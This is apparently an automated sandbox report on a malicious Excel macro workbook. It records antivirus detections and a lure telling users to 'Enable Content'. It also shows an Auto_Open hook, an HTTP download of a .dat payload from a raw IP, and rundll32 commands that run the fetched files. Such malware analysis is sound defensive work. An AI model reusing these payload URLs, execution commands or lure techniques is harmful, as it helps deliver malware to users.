Source: DEBT_2026004977_03182021.xlsm |
Avira: detected |
Source: http://185.82.219.219/44375.7393215278.dat |
Avira URL Cloud: Label: malware |
Source: DEBT_2026004977_03182021.xlsm |
Virustotal: Detection: 56% |
Source: DEBT_2026004977_03182021.xlsm |
ReversingLabs: Detection: 68% |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe |
Source: global traffic |
TCP traffic: 192.168.2.22:49169 -> 185.82.219.219:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 188.127.231.55:80 |
Source: Yara match |
File source: sharedStrings.xml, type: SAMPLE |
Source: Joe Sandbox View |
IP Address: 45.140.146.180 |
Source: Joe Sandbox View |
IP Address: 188.127.231.55 |
Source: global traffic |
HTTP traffic detected: GET /44375.7393215278.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 185.82.219.219
Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.127.231.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.140.146.180 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.219.219 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A4B8C50.jpeg |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Jun 2021 15:46:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 b1 0a c2 30 10 86 77 c1 77 38 3b e9 90 a6 85 8e 31 8b 28 38 e8 22 3e 40 62 ce 26 90 26 12 53 b4 6f 6f a2 15 c4 d9 d1 f1 fe fb ee bb e3 98 8e 9d e5 d3 09 d3 28 14 67 d1 44 8b bc a9 1a d8 fb 08 1b df 3b c5 e8 2b 64 f4 89 24 54 7a 35 80 6c 4f de fa b0 2c 6e da 44 2c b2 e2 84 2e 62 e0 4c d7 df 86 94 30 3a b6 f3 ae 04 8d 95 6b 8d bb d3 ba ac 9b b2 82 f9 51 f6 2e f6 8b 4f 96 e6 6d d9 4e df 97 ce 08 01 01 17 a1 94 71 2d 44 0f ca 5c 85 b4 08 bb c3 76 0d c2 29 58 e9 e0 3b 84 73 30 e8 94 1d 00 43 f0 21 4d b4 08 84 64 d7 5f f1 cb 5f 3c 00 85 02 e0 de 44 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: c60ww8;1(8">@b&&Soo(gD;+d$Tz5lO,nD,.bL0:kQ.OmNq-D\v)X;s0C!Md__<D0 |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: Screenshot number: 4 |
Screenshot OCR: Enable editing button from the yellow bar above Onoe you have enabled editing. please click Enabl |
Source: Screenshot number: 4 |
Screenshot OCR: Enable Content bytton from the yellow bar above ,,,,,, L' Rr ;^1 I m m RunDLL |~| ,0 There was |
Source: Screenshot number: 8 |
Screenshot OCR: Enable editing button from the yellow bar above 12 " Onoe you have enabled editing. please click En |
Source: Screenshot number: 8 |
Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25 |
Source: Document image extraction number: 1 |
Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled edding, please click Enable |
Source: Document image extraction number: 1 |
Screenshot OCR: Enable Content bytton from the yellow bar above |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: EXEC |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: Sheet size: 19412 |
Source: workbook.xml |
Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F0EB3E64-B098-469B-980C-4533D5392CC4}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="sheet" sheetId="1" r:id="rId1"/><sheet name="sheet1" sheetId="2" r:id="rId2"/><sheet name="sheet2" sheetId="8" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">sheet1!$AO$168</definedName></definedNames><calcPr calcId="162913"/></workbook> |
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp |
Binary or memory string: .VBPud<_ |
Source: classification engine |
Classification label: mal96.troj.expl.evad.winXLSM@7/7@0/3 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\Desktop\~$DEBT_2026004977_03182021.xlsm |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVRC2B2.tmp |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Source: C:\Windows\System32\rundll32.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer |
|
Source: C:\Windows\System32\rundll32.exe |
Automated click: OK |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: OLE zip file path = xl/drawings/drawing2.xml |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: OLE zip file path = xl/drawings/drawing3.xml |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: OLE zip file path = xl/drawings/_rels/drawing3.xml.rels |
Source: DEBT_2026004977_03182021.xlsm |
Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |